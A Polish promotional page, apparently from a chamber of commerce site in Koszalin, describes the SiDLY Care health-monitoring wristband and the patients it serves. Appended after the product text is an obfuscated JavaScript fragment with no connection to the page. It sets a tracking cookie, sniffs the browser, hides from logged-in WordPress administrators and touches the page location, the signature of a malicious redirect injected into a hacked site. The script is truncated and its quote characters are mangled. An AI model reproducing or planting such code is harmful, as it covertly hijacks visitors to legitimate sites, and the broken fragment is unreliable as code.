Jak zadbać o bezpieczeństwo swoich bliskich? | Północna Izba Gospodarcza w Koszalinie

Jak w prosty i wygodny sposób zadbać o bezpieczeństwo swoich bliskich?

Systematyczne pomiary, bieżący monitoring, swoboda funkcjonowania i niezależność podopiecznego.

Opiekunowi daje możliwość wykonywania codziennych obowiązków, a jednocześnie przekonanie, że odległość nie ma znaczenia dla opieki nad bliskimi.

SiDLY Care to polski produkt, jest połączeniem prostoty i wygody. Dzięki dyskretności i łatwości użycia zwiększa poczucie bezpieczeństwa, pozwala na systematyczność pomiarów, bieżący monitoring, swobodę funkcjonowania i niezależność. Opiekunowi daje możliwość wykonywania codziennych obowiązków, a jednocześnie przekonanie, że odległość nie ma znaczenia dla opieki nad bliskimi.

Komu dedykowana jest opaska SiDLY Care?

  • Osobom chcących na bieżąco monitorować parametry życiowe
  • Kobietom w ciąży prowadzącym aktywny tryb życia
  • Chorym na epilepsję
  • Osobom wymagającym długotrwałej rehabilitacji domowej, samodzielnych ćwiczeń,wczesnego reagowania na nieprawidłowości
  • Osobom z problemami kardiologicznymi, po ablacji i zabiegach kardiologicznych
  • Osobom chorym na Alzheimera i demencję
  • Osobom w trakcie rehabilitacji
  • Osobom starszym
  • Osobom wykonującym zawody podwyższonego ryzyka
  • Osobom przewlekle chorym pozostającym w warunkach domowych jak i w trakcie rekonwalescencji jako stały element nadzoru nad wybranymi parametrami życiowymi.

Tak scharakteryzowane urządzenie jest pierwszym wyprodukowanym w Polsce urządzeniem medycznym umożliwiającym zdalną opiekę medyczną.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m